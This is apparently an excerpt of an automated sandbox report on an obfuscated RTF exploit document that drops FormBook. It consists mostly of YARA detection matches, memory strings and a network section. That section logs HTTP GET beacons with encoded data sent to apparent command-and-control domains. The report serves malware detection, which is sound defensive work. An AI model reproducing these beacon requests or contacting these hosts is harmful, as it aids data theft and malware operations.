          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.thegoldencamel.online
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 16:39:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: MISSServer: cloudflareCF-RAY: 7379b09ee927997b-FRAData Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Document contains OLE streams which likely are hidden ActiveX objects
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489047/\x1Ole10Native' : ....Client.exe.C:\Path\Client.exe.........C:\Path\
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
